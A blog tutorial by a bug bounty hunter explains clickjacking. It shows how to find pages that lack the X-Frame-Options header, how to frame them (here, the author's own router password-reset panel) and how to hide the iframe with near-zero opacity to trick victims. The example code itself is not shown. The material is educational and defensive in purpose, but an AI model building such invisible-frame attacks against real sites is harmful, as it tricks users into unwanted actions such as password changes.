This is the easiest bug you can find.

In case you are new here, I am Deadoverflow, cyber security researcher, and I am trying my best in giving people free content and helping them find their first bug or just get started with hacking for free!

You can subscribe to my YouTube channel on which I will be uploading educational content since I have well over 2 years in experience in bug hunting and close to around 50 bugs in those 2 years.

Youtube: https://youtu.be/tqSK50xo9yE?si=JKlQ0onnSnUO0ZPF

In case you want to support me even more, here is my patreon.

Patreon: https://www.patreon.com/Deadoverflow

With all of that said, this is the easiest bug ever to hunt for!

Clickjacking — (UI Redressing)

Clickjacking is a type of vulnerability that is really easy to hunt for. I would argue that it is the easiest vulnerability to hunt for but among harder ones when it comes to developing an exploit.

Usually, I use AI like Chat GPT to develop an exploit since it is the easiest way, I just need to patch a few things here and there in the code and it’s all good to go! Note that you need to know basic HTML and CSS as well as some basic JavaScript.

With that said, let’s just start!

Every HTTP request contains headers to help the web server know who is currently requesting some resource. For example, when you visit https://example.com your browser sends an HTTP request containing HTTP headers like this:

Once the server returns a response, the web server also returns response HTTP headers like this:

If you are not familiar with request and response HTTP headers, I recommend you check out this and then come back here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers

We are going to be mostly talking about X-Frame-Option response header since it is a key factor in identifying a vulnerability.

X-Frame-Options is a security header which tells the browser if it should allow other websites to iframe it or not. For example if you navigate over to Instagram.com you can see that they have an X-Frame-Options header set to DENY, meaning it browser would not load instagram.com if it’s embedded in an iframe.

Now that you know what is this header, let’s start researching!

Once you get your target website ready, you want to open chrome developer tools and navigate to the Network tab.

Then let’s navigate to the Doc tab instead of All.

Now let’s refresh the target webpage.

You can see that there is an example.com HTTP request being captured so let’s expand it and see if there is X-Frame-Options header present.

As you can see in the image, there is no X-Frame-Options header present, meaning we can just add example.com into an iframe.

So let’s try that out!

I created a new HTML document and wrote this:

This HTML will try to load example.com and now let’s see if it can successfully load this page.

I will open this test.html document in the browser now.

As you can see, example.com can be loaded from any other domain but is this a vulnerability?

The answer is, no. This is not a vulnerability because there cannot be any sensitive actions preformed.

Let’s take a look at another target where there is actually sensitive data stored and available.

That target will be my routers web interface again, so let’s research.

Once I logged in and connected to the web interface, I immediately noticed that there is no X-Frame-Options header present, so let’s try to put http://192.168.1.1 into an iframe.

This is the HTML behind this test, now let’s open this document in a browser and see what happens.

As you can see, this successfully was loaded into a whole different webpage meaning that this could be a vulnerability, however we first of all need to see what could be our attack surface.

I explored the web interface a little and found this:

The panel to reset your password is another HTML file and there is also no X-Frame-Options header present on it’s response. Now I will copy this:

and try to put it into an iframe.

Now lets open test.html in browser and see what happens.

As you can see, this was also loaded successfully and this is in fact a vulnerability.

An attacker can now mask some stuff and trick the victim into setting a password that an attacker wants.

The way you would trick the victim into doing something unintentionally is by setting the opacity of an iframe to a low number so that it cannot be seen.

As seen in the image above, I set the opacity to be 0.3 and this is how it looks like:

You can barely see it and for your exploit, you would want to set the opacity to 0.001 so that it appears invisible.

As you can see, the iframe is completely invisible and victim wouldn’t even notice that there is something malicious going on.

I hope this briefly summarizes how Clickjacking or UI Redressing works and I hope you will now change the way you approach a target to find this type of vulnerability.

If you have any questions, you can reach out to me via email ihusanovic3@gmail.com or on Instagram @dead0verflow https://instagram.com/dead0verflow

I will be trying to answer any questions you may have!